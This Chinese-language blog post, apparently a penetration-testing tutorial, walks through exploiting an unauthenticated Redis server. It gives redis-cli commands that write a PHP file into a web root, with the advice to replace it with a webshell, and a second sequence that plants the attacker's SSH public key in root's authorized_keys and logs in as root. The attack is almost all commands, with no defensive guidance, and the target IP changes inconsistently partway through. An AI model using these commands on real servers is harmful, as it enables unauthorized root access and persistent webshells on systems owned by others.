Redis未授权访问漏洞的利用
渗透学习交流群:773617250,群内定期直播,发布相关教程,欢迎咨询群主学习交流!
利用redis写webshell
在redis-cli中写入以下命令:
config set dir /var/www/html/
config set dbfilename redis.php
set webshell “<?php phpinfo(); ?>”
save
然后看一下目录下是否生成了一个redis.php的文件
可以看到生成了,查看一下文件的内容
在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
Redis 未授权访问配合 SSH key 文件利用
首先在攻击机生成密匙:ssh-keygen –t rsa
看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容
然后将公钥写入key.txt中
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt
然后连接redis进行写入
$ cat key.txt | redis-cli -h 192.168.136.133 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.136.133:6379> config set dir /root/.ssh/
$ 192.168.1.11:6379> config set dbfilename “authorized_keys”
$ 192.168.1.11:6379> save
然后去目标机看一下是否生成
然后回到攻击机,利用自己的密钥进行ssh登录:
ssh –i id_rsa root@192.168.136.133
- 点赞
- 收藏
- 分享
- 文章举报
- redis未授权访问漏洞利用
- Redis 未授权访问漏洞讲解利用加批量寻找
- Redis未授权访问漏洞的利用
- 关于Redis未授权访问漏洞利用的介绍与修复建议
- Redis未授权访问漏洞的利用姿势
- [ Redis ] Redis 未授权访问漏洞被利用,服务器登陆不上
- Redis未授权访问漏洞的利用
- 不请自来 | Redis 未授权访问漏洞深度利用
- 关于Redis未授权访问漏洞利用的介绍与修复建议
- Redis未授权访问漏洞的利用及防护
- Redis未授权访问漏洞的利用
- Memcache未授权访问漏洞利用及修复
- redis未授权访问漏洞学习文档
- Redis 未授权访问漏洞(附Python脚本)
- Redis 未授权访问漏洞
- Redis未授权访问漏洞分析
- Docker Remote API未授权访问漏洞分析和利用
- 服务器由于redis未授权访问漏洞被攻击
- 利用CouchDB未授权访问漏洞执行任意系统命令
- Redis未授权如何访问漏洞?